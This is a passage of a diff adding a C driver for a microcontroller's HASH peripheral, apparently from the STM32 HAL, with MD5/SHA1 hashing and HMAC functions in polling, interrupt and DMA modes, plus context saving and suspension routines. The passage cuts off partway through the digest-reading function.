+ (++) HAL_HASH_SHA1_Start_DMA() + (++) HAL_HASH_SHA1_Finish() + + [..] When resorting to DMA mode to enter the data in the Peripheral, user must resort + to HAL_HASH_xxx_Start_DMA() then read the resulting digest with + HAL_HASH_xxx_Finish(). + [..] In case of multi-buffer HASH processing, MDMAT bit must first be set before + the successive calls to HAL_HASH_xxx_Start_DMA(). Then, MDMAT bit needs to be + reset before the last call to HAL_HASH_xxx_Start_DMA(). Digest is finally + retrieved thanks to HAL_HASH_xxx_Finish(). + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the HASH peripheral in MD5 mode then initiate a DMA transfer + * to feed the input buffer to the Peripheral. + * @note Once the DMA transfer is finished, HAL_HASH_MD5_Finish() API must + * be called to retrieve the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief Return the computed digest in MD5 mode. + * @note The API waits for DCIS to be set then reads the computed digest. + * @note HAL_HASH_MD5_Finish() can be used as well to retrieve the digest in + * HMAC MD5 mode. + * @param hhash HASH handle. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_MD5_Finish(HASH_HandleTypeDef *hhash, uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Finish(hhash, pOutBuffer, Timeout); +} + +/** + * @brief Initialize the HASH peripheral in SHA1 mode then initiate a DMA transfer + * to feed the input buffer to the Peripheral. + * @note Once the DMA transfer is finished, HAL_HASH_SHA1_Finish() API must + * be called to retrieve the computed digest. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + + +/** + * @brief Return the computed digest in SHA1 mode. + * @note The API waits for DCIS to be set then reads the computed digest. + * @note HAL_HASH_SHA1_Finish() can be used as well to retrieve the digest in + * HMAC SHA1 mode. + * @param hhash HASH handle. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_SHA1_Finish(HASH_HandleTypeDef *hhash, uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Finish(hhash, pOutBuffer, Timeout); +} + +/** + * @} + */ + +/** @defgroup HASH_Exported_Functions_Group5 HMAC processing functions in polling mode + * @brief HMAC processing functions using polling mode. + * +@verbatim + =============================================================================== + ##### Polling mode HMAC processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in polling mode + the HMAC value using one of the following algorithms: + (+) MD5 + (++) HAL_HMAC_MD5_Start() + (+) SHA1 + (++) HAL_HMAC_SHA1_Start() + + +@endverbatim + * @{ + */ + +/** + * @brief Initialize the HASH peripheral in HMAC MD5 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMAC_MD5_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Timeout) +{ + return HMAC_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief Initialize the HASH peripheral in HMAC SHA1 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMAC_SHA1_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Timeout) +{ + return HMAC_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA1); +} + +/** + * @} + */ + + +/** @defgroup HASH_Exported_Functions_Group6 HMAC processing functions in interrupt mode + * @brief HMAC processing functions using interrupt mode. + * +@verbatim + =============================================================================== + ##### Interrupt mode HMAC processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in interrupt mode + the HMAC value using one of the following algorithms: + (+) MD5 + (++) HAL_HMAC_MD5_Start_IT() + (+) SHA1 + (++) HAL_HMAC_SHA1_Start_IT() + +@endverbatim + * @{ + */ + + +/** + * @brief Initialize the HASH peripheral in HMAC MD5 mode, next process pInBuffer then + * read the computed digest in interrupt mode. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 16 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMAC_MD5_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HMAC_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_MD5); +} + +/** + * @brief Initialize the HASH peripheral in HMAC SHA1 mode, next process pInBuffer then + * read the computed digest in interrupt mode. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 20 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMAC_SHA1_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HMAC_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA1); +} + +/** + * @} + */ + + + +/** @defgroup HASH_Exported_Functions_Group7 HMAC processing functions in DMA mode + * @brief HMAC processing functions using DMA modes. + * +@verbatim + =============================================================================== + ##### DMA mode HMAC processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in DMA mode + the HMAC value using one of the following algorithms: + (+) MD5 + (++) HAL_HMAC_MD5_Start_DMA() + (+) SHA1 + (++) HAL_HMAC_SHA1_Start_DMA() + + [..] When resorting to DMA mode to enter the data in the Peripheral for HMAC processing, + user must resort to HAL_HMAC_xxx_Start_DMA() then read the resulting digest + with HAL_HASH_xxx_Finish(). + +@endverbatim + * @{ + */ + + +/** + * @brief Initialize the HASH peripheral in HMAC MD5 mode then initiate the required + * DMA transfers to feed the key and the input buffer to the Peripheral. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASH_MD5_Finish() API must be called to retrieve + * the computed digest. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note If MDMAT bit is set before calling this function (multi-buffer + * HASH processing case), the input buffer size (in bytes) must be + * a multiple of 4 otherwise, the HASH digest computation is corrupted. + * For the processing of the last buffer of the thread, MDMAT bit must + * be reset and the buffer length (in bytes) doesn't have to be a + * multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMAC_MD5_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_MD5); +} + + +/** + * @brief Initialize the HASH peripheral in HMAC SHA1 mode then initiate the required + * DMA transfers to feed the key and the input buffer to the Peripheral. + * @note Once the DMA transfers are finished (indicated by hhash->State set back + * to HAL_HASH_STATE_READY), HAL_HASH_SHA1_Finish() API must be called to retrieve + * the computed digest. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note If MDMAT bit is set before calling this function (multi-buffer + * HASH processing case), the input buffer size (in bytes) must be + * a multiple of 4 otherwise, the HASH digest computation is corrupted. + * For the processing of the last buffer of the thread, MDMAT bit must + * be reset and the buffer length (in bytes) doesn't have to be a + * multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HMAC_SHA1_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HMAC_Start_DMA(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA1); +} + +/** + * @} + */ + +/** @defgroup HASH_Exported_Functions_Group8 Peripheral states functions + * @brief Peripheral State functions. + * +@verbatim + =============================================================================== + ##### Peripheral State methods ##### + =============================================================================== + [..] + This section permits to get in run-time the state and the peripheral handle + status of the peripheral: + (+) HAL_HASH_GetState() + (+) HAL_HASH_GetStatus() + + [..] + Additionally, this subsection provides functions allowing to save and restore + the HASH or HMAC processing context in case of calculation suspension: + (+) HAL_HASH_ContextSaving() + (+) HAL_HASH_ContextRestoring() + + [..] + This subsection provides functions allowing to suspend the HASH processing + (+) when input are fed to the Peripheral by software + (++) HAL_HASH_SwFeed_ProcessSuspend() + (+) when input are fed to the Peripheral by DMA + (++) HAL_HASH_DMAFeed_ProcessSuspend() + + + +@endverbatim + * @{ + */ + +/** + * @brief Return the HASH handle state. + * @note The API yields the current state of the handle (BUSY, READY,...). + * @param hhash HASH handle. + * @retval HAL HASH state + */ +HAL_HASH_StateTypeDef HAL_HASH_GetState(HASH_HandleTypeDef *hhash) +{ + return hhash->State; +} + + +/** + * @brief Return the HASH HAL status. + * @note The API yields the HAL status of the handle: it is the result of the + * latest HASH processing and allows to report any issue (e.g. HAL_TIMEOUT). + * @param hhash HASH handle. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_GetStatus(HASH_HandleTypeDef *hhash) +{ + return hhash->Status; +} + +/** + * @brief Save the HASH context in case of processing suspension. + * @param hhash HASH handle. + * @param pMemBuffer pointer to the memory buffer where the HASH context + * is saved. + * @note The IMR, STR, CR then all the CSR registers are saved + * in that order. Only the r/w bits are read to be restored later on. + * @note By default, all the context swap registers (there are + * HASH_NUMBER_OF_CSR_REGISTERS of those) are saved. + * @note pMemBuffer points to a buffer allocated by the user. The buffer size + * must be at least (HASH_NUMBER_OF_CSR_REGISTERS + 3) * 4 uint8 long. + * @retval None + */ +void HAL_HASH_ContextSaving(HASH_HandleTypeDef *hhash, uint8_t *pMemBuffer) +{ + uint32_t mem_ptr = (uint32_t)pMemBuffer; + uint32_t csr_ptr = (uint32_t)HASH->CSR; + uint32_t i; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* Save IMR register content */ + *(uint32_t *)(mem_ptr) = READ_BIT(HASH->IMR, HASH_IT_DINI | HASH_IT_DCI); + mem_ptr += 4U; + /* Save STR register content */ + *(uint32_t *)(mem_ptr) = READ_BIT(HASH->STR, HASH_STR_NBLW); + mem_ptr += 4U; + /* Save CR register content */ +#if defined(HASH_CR_MDMAT) + *(uint32_t *)(mem_ptr) = READ_BIT(HASH->CR, HASH_CR_DMAE | HASH_CR_DATATYPE | HASH_CR_MODE | HASH_CR_ALGO | + HASH_CR_LKEY | HASH_CR_MDMAT); +#else + *(uint32_t *)(mem_ptr) = READ_BIT(HASH->CR, HASH_CR_DMAE | HASH_CR_DATATYPE | HASH_CR_MODE | HASH_CR_ALGO | + HASH_CR_LKEY); +#endif /* HASH_CR_MDMAT*/ + mem_ptr += 4U; + /* By default, save all CSRs registers */ + for (i = HASH_NUMBER_OF_CSR_REGISTERS; i > 0U; i--) + { + *(uint32_t *)(mem_ptr) = *(uint32_t *)(csr_ptr); + mem_ptr += 4U; + csr_ptr += 4U; + } +} + + +/** + * @brief Restore the HASH context in case of processing resumption. + * @param hhash HASH handle. + * @param pMemBuffer pointer to the memory buffer where the HASH context + * is stored. + * @note The IMR, STR, CR then all the CSR registers are restored + * in that order. Only the r/w bits are restored. + * @note By default, all the context swap registers (HASH_NUMBER_OF_CSR_REGISTERS + * of those) are restored (all of them have been saved by default + * beforehand). + * @retval None + */ +void HAL_HASH_ContextRestoring(HASH_HandleTypeDef *hhash, uint8_t *pMemBuffer) +{ + uint32_t mem_ptr = (uint32_t)pMemBuffer; + uint32_t csr_ptr = (uint32_t)HASH->CSR; + uint32_t i; + + /* Prevent unused argument(s) compilation warning */ + UNUSED(hhash); + + /* Restore IMR register content */ + WRITE_REG(HASH->IMR, (*(uint32_t *)(mem_ptr))); + mem_ptr += 4U; + /* Restore STR register content */ + WRITE_REG(HASH->STR, (*(uint32_t *)(mem_ptr))); + mem_ptr += 4U; + /* Restore CR register content */ + WRITE_REG(HASH->CR, (*(uint32_t *)(mem_ptr))); + mem_ptr += 4U; + + /* Reset the HASH processor before restoring the Context + Swap Registers (CSR) */ + __HAL_HASH_INIT(); + + /* By default, restore all CSR registers */ + for (i = HASH_NUMBER_OF_CSR_REGISTERS; i > 0U; i--) + { + WRITE_REG((*(uint32_t *)(csr_ptr)), (*(uint32_t *)(mem_ptr))); + mem_ptr += 4U; + csr_ptr += 4U; + } +} + + +/** + * @brief Initiate HASH processing suspension when in polling or interruption mode. + * @param hhash HASH handle. + * @note Set the handle field SuspendRequest to the appropriate value so that + * the on-going HASH processing is suspended as soon as the required + * conditions are met. Note that the actual suspension is carried out + * by the functions HASH_WriteData() in polling mode and HASH_IT() in + * interruption mode. + * @retval None + */ +void HAL_HASH_SwFeed_ProcessSuspend(HASH_HandleTypeDef *hhash) +{ + /* Set Handle Suspend Request field */ + hhash->SuspendRequest = HAL_HASH_SUSPEND; +} + +/** + * @brief Suspend the HASH processing when in DMA mode. + * @param hhash HASH handle. + * @note When suspension attempt occurs at the very end of a DMA transfer and + * all the data have already been entered in the Peripheral, hhash->State is + * set to HAL_HASH_STATE_READY and the API returns HAL_ERROR. It is + * recommended to wrap-up the processing in reading the digest as usual. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASH_DMAFeed_ProcessSuspend(HASH_HandleTypeDef *hhash) +{ + uint32_t tmp_remaining_DMATransferSize_inWords; + uint32_t tmp_initial_DMATransferSize_inWords; + uint32_t tmp_words_already_pushed; + + if (hhash->State == HAL_HASH_STATE_READY) + { + return HAL_ERROR; + } + else + { + + /* Make sure there is enough time to suspend the processing */ + tmp_remaining_DMATransferSize_inWords = ((DMA_Stream_TypeDef *)hhash->hdmain->Instance)->NDTR; + + if (tmp_remaining_DMATransferSize_inWords <= HASH_DMA_SUSPENSION_WORDS_LIMIT) + { + /* No suspension attempted since almost to the end of the transferred data. */ + /* Best option for user code is to wrap up low priority message hashing */ + return HAL_ERROR; + } + + /* Wait for BUSY flag to be reset */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, SET, HASH_TIMEOUTVALUE) != HAL_OK) + { + return HAL_TIMEOUT; + } + + if (__HAL_HASH_GET_FLAG(HASH_FLAG_DCIS) != RESET) + { + return HAL_ERROR; + } + + /* Wait for BUSY flag to be set */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, RESET, HASH_TIMEOUTVALUE) != HAL_OK) + { + return HAL_TIMEOUT; + } + /* Disable DMA channel */ + /* Note that the Abort function will + - Clear the transfer error flags + - Unlock + - Set the State + */ + if (HAL_DMA_Abort(hhash->hdmain) != HAL_OK) + { + return HAL_ERROR; + } + + /* Clear DMAE bit */ + CLEAR_BIT(HASH->CR, HASH_CR_DMAE); + + /* Wait for BUSY flag to be reset */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_BUSY, SET, HASH_TIMEOUTVALUE) != HAL_OK) + { + return HAL_TIMEOUT; + } + + if (__HAL_HASH_GET_FLAG(HASH_FLAG_DCIS) != RESET) + { + return HAL_ERROR; + } + + /* At this point, DMA interface is disabled and no transfer is on-going */ + /* Retrieve from the DMA handle how many words remain to be written */ + tmp_remaining_DMATransferSize_inWords = ((DMA_Stream_TypeDef *)hhash->hdmain->Instance)->NDTR; + + if (tmp_remaining_DMATransferSize_inWords == 0U) + { + /* All the DMA transfer is actually done. Suspension occurred at the very end + of the transfer. Either the digest computation is about to start (HASH case) + or processing is about to move from one step to another (HMAC case). + In both cases, the processing can't be suspended at this point. It is + safer to + - retrieve the low priority block digest before starting the high + priority block processing (HASH case) + - re-attempt a new suspension (HMAC case) + */ + return HAL_ERROR; + } + else + { + + /* Compute how many words were supposed to be transferred by DMA */ + tmp_initial_DMATransferSize_inWords = (((hhash->HashInCount % 4U) != 0U) ? \ + ((hhash->HashInCount + 3U) / 4U) : (hhash->HashInCount / 4U)); + + /* If discrepancy between the number of words reported by DMA Peripheral and + the numbers of words entered as reported by HASH Peripheral, correct it */ + /* tmp_words_already_pushed reflects the number of words that were already pushed before + the start of DMA transfer (multi-buffer processing case) */ + tmp_words_already_pushed = hhash->NbWordsAlreadyPushed; + if (((tmp_words_already_pushed + tmp_initial_DMATransferSize_inWords - \ + tmp_remaining_DMATransferSize_inWords) % 16U) != HASH_NBW_PUSHED()) + { + tmp_remaining_DMATransferSize_inWords--; /* one less word to be transferred again */ + } + + /* Accordingly, update the input pointer that points at the next word to be + transferred to the Peripheral by DMA */ + hhash->pHashInBuffPtr += 4U * (tmp_initial_DMATransferSize_inWords - tmp_remaining_DMATransferSize_inWords) ; + + /* And store in HashInCount the remaining size to transfer (in bytes) */ + hhash->HashInCount = 4U * tmp_remaining_DMATransferSize_inWords; + + } + + /* Set State as suspended */ + hhash->State = HAL_HASH_STATE_SUSPENDED; + + return HAL_OK; + + } +} + +/** + * @brief Return the HASH handle error code. + * @param hhash pointer to a HASH_HandleTypeDef structure. + * @retval HASH Error Code + */ +uint32_t HAL_HASH_GetError(HASH_HandleTypeDef *hhash) +{ + /* Return HASH Error Code */ + return hhash->ErrorCode; +} +/** + * @} + */ + + +/** + * @} + */ + +/** @defgroup HASH_Private_Functions HASH Private Functions + * @{ + */ + +/** + * @brief DMA HASH Input Data transfer completion callback. + * @param hdma DMA handle. + * @note In case of HMAC processing, HASH_DMAXferCplt() initiates + * the next DMA transfer for the following HMAC step. + * @retval None + */ +static void HASH_DMAXferCplt(DMA_HandleTypeDef *hdma) +{ + HASH_HandleTypeDef *hhash = (HASH_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + uint32_t inputaddr; + uint32_t buffersize; + HAL_StatusTypeDef status = HAL_OK; + + if (hhash->State != HAL_HASH_STATE_SUSPENDED) + { + + /* Disable the DMA transfer */ + CLEAR_BIT(HASH->CR, HASH_CR_DMAE); + + if (READ_BIT(HASH->CR, HASH_CR_MODE) == 0U) + { + /* If no HMAC processing, input data transfer is now over */ + + /* Change the HASH state to ready */ + hhash->State = HAL_HASH_STATE_READY; + + /* Call Input data transfer complete call back */ +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->InCpltCallback(hhash); +#else + HAL_HASH_InCpltCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + + } + else + { + /* HMAC processing: depending on the current HMAC step and whether or + not multi-buffer processing is on-going, the next step is initiated + and MDMAT bit is set. */ + + + if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_3) + { + /* This is the end of HMAC processing */ + + /* Change the HASH state to ready */ + hhash->State = HAL_HASH_STATE_READY; + + /* Call Input data transfer complete call back + (note that the last DMA transfer was that of the key + for the outer HASH operation). */ +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->InCpltCallback(hhash); +#else + HAL_HASH_InCpltCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + + return; + } + else if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_1) + { + inputaddr = (uint32_t)hhash->pHashMsgBuffPtr; /* DMA transfer start address */ + buffersize = hhash->HashBuffSize; /* DMA transfer size (in bytes) */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_2; /* Move phase from Step 1 to Step 2 */ + + /* In case of suspension request, save the new starting parameters */ + hhash->HashInCount = hhash->HashBuffSize; /* Initial DMA transfer size (in bytes) */ + hhash->pHashInBuffPtr = hhash->pHashMsgBuffPtr ; /* DMA transfer start address */ + + hhash->NbWordsAlreadyPushed = 0U; /* Reset number of words already pushed */ +#if defined(HASH_CR_MDMAT) + /* Check whether or not digest calculation must be disabled (in case of multi-buffer HMAC processing) */ + if (hhash->DigestCalculationDisable != RESET) + { + /* Digest calculation is disabled: Step 2 must start with MDMAT bit set, + no digest calculation will be triggered at the end of the input buffer feeding to the Peripheral */ + __HAL_HASH_SET_MDMAT(); + } +#endif /* HASH_CR_MDMAT*/ + } + else /*case (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_2)*/ + { + if (hhash->DigestCalculationDisable != RESET) + { + /* No automatic move to Step 3 as a new message buffer will be fed to the Peripheral + (case of multi-buffer HMAC processing): + DCAL must not be set. + Phase remains in Step 2, MDMAT remains set at this point. + Change the HASH state to ready and call Input data transfer complete call back. */ + hhash->State = HAL_HASH_STATE_READY; +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->InCpltCallback(hhash); +#else + HAL_HASH_InCpltCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + return ; + } + else + { + /* Digest calculation is not disabled (case of single buffer input or last buffer + of multi-buffer HMAC processing) */ + inputaddr = (uint32_t)hhash->Init.pKey; /* DMA transfer start address */ + buffersize = hhash->Init.KeySize; /* DMA transfer size (in bytes) */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_3; /* Move phase from Step 2 to Step 3 */ + /* In case of suspension request, save the new starting parameters */ + hhash->HashInCount = hhash->Init.KeySize; /* Initial size for second DMA transfer (input data) */ + hhash->pHashInBuffPtr = hhash->Init.pKey ; /* address passed to DMA, now entering data message */ + + hhash->NbWordsAlreadyPushed = 0U; /* Reset number of words already pushed */ + } + } + + /* Configure the Number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(buffersize); + + /* Set the HASH DMA transfer completion call back */ + hhash->hdmain->XferCpltCallback = HASH_DMAXferCplt; + + /* Enable the DMA In DMA stream */ + status = HAL_DMA_Start_IT(hhash->hdmain, inputaddr, (uint32_t)&HASH->DIN, \ + (((buffersize % 4U) != 0U) ? ((buffersize + (4U - (buffersize % 4U))) / 4U) : \ + (buffersize / 4U))); + + + + /* Enable DMA requests */ + SET_BIT(HASH->CR, HASH_CR_DMAE); + + /* Return function status */ + if (status != HAL_OK) + { + /* Update HASH state machine to error */ + hhash->State = HAL_HASH_STATE_ERROR; + } + else + { + /* Change HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + } + } + } + + return; +} + +/** + * @brief DMA HASH communication error callback. + * @param hdma DMA handle. + * @note HASH_DMAError() callback invokes HAL_HASH_ErrorCallback() that + * can contain user code to manage the error. + * @retval None + */ +static void HASH_DMAError(DMA_HandleTypeDef *hdma) +{ + HASH_HandleTypeDef *hhash = (HASH_HandleTypeDef *)((DMA_HandleTypeDef *)hdma)->Parent; + + if (hhash->State != HAL_HASH_STATE_SUSPENDED) + { + hhash->ErrorCode |= HAL_HASH_ERROR_DMA; + /* Set HASH state to ready to prevent any blocking issue in user code + present in HAL_HASH_ErrorCallback() */ + hhash->State = HAL_HASH_STATE_READY; + /* Set HASH handle status to error */ + hhash->Status = HAL_ERROR; +#if (USE_HAL_HASH_REGISTER_CALLBACKS == 1) + hhash->ErrorCallback(hhash); +#else + HAL_HASH_ErrorCallback(hhash); +#endif /* USE_HAL_HASH_REGISTER_CALLBACKS */ + /* After error handling by code user, reset HASH handle HAL status */ + hhash->Status = HAL_OK; + + } +} + +/** + * @brief Feed the input buffer to the HASH Peripheral. + * @param hhash HASH handle. + * @param pInBuffer pointer to input buffer. + * @param Size the size of input buffer in bytes. + * @note HASH_WriteData() regularly reads hhash->SuspendRequest to check whether + * or not the HASH processing must be suspended. If this is the case, the + * processing is suspended when possible and the Peripheral feeding point reached at + * suspension time is stored in the handle for resumption later on. + * @retval HAL status + */ +static HAL_StatusTypeDef HASH_WriteData(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + uint32_t buffercounter; + __IO uint32_t inputaddr = (uint32_t) pInBuffer; + + for (buffercounter = 0U; buffercounter < Size; buffercounter += 4U) + { + /* Write input data 4 bytes at a time */ + HASH->DIN = *(uint32_t *)inputaddr; + inputaddr += 4U; + + /* If the suspension flag has been raised and if the processing is not about + to end, suspend processing */ + if ((hhash->SuspendRequest == HAL_HASH_SUSPEND) && ((buffercounter + 4U) < Size)) + { + /* Wait for DINIS = 1, which occurs when 16 32-bit locations are free + in the input buffer */ + if (__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS)) + { + /* Reset SuspendRequest */ + hhash->SuspendRequest = HAL_HASH_SUSPEND_NONE; + + /* Depending whether the key or the input data were fed to the Peripheral, the feeding point + reached at suspension time is not saved in the same handle fields */ + if ((hhash->Phase == HAL_HASH_PHASE_PROCESS) || (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_2)) + { + /* Save current reading and writing locations of Input and Output buffers */ + hhash->pHashInBuffPtr = (uint8_t *)inputaddr; + /* Save the number of bytes that remain to be processed at this point */ + hhash->HashInCount = Size - (buffercounter + 4U); + } + else if ((hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_1) || (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_3)) + { + /* Save current reading and writing locations of Input and Output buffers */ + hhash->pHashKeyBuffPtr = (uint8_t *)inputaddr; + /* Save the number of bytes that remain to be processed at this point */ + hhash->HashKeyCount = Size - (buffercounter + 4U); + } + else + { + /* Unexpected phase: unlock process and report error */ + hhash->State = HAL_HASH_STATE_READY; + __HAL_UNLOCK(hhash); + return HAL_ERROR; + } + + /* Set the HASH state to Suspended and exit to stop entering data */ + hhash->State = HAL_HASH_STATE_SUSPENDED; + + return HAL_OK; + } /* if (__HAL_HASH_GET_FLAG(HASH_FLAG_DINIS)) */ + } /* if ((hhash->SuspendRequest == HAL_HASH_SUSPEND) && ((buffercounter+4) < Size)) */ + } /* for(buffercounter = 0; buffercounter < Size; buffercounter+=4) */ + + /* At this point, all the data have been entered to the Peripheral: exit */ + return HAL_OK; +} + +/** + * @brief Retrieve the message digest. + * @param pMsgDigest pointer to the computed digest. + * @param Size message digest size in bytes. + * @retval None + */ +static void HASH_GetDigest(uint8_t *pMsgDigest, uint8_t Size) +{ + uint32_t msgdigest = (uint32_t)pMsgDigest; + + switch (Size) + { + /* Read the message digest */ + case 16: /* MD5 */ + *(uint32_t *)(msgdigest) = __REV(HASH->HR[0]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[1]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[2]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[3]); + break; + case 20: /* SHA1 */ + *(uint32_t *)(msgdigest) = __REV(HASH->HR[0]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[1]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[2]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[3]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[4]); + break; + case 28: /* SHA224 */ + *(uint32_t *)(msgdigest) = __REV(HASH->HR[0]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[1]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[2]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[3]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[4]); +#if defined(HASH_CR_MDMAT) + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH_DIGEST->HR[5]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH_DIGEST->HR[6]); +#endif /* HASH_CR_MDMAT*/ + break; + case 32: /* SHA256 */ + *(uint32_t *)(msgdigest) = __REV(HASH->HR[0]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[1]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[2]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[3]); + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH->HR[4]); +#if defined(HASH_CR_MDMAT) + msgdigest += 4U; + *(uint32_t *)(msgdigest) = __REV(HASH_DIGEST->HR[5]); + 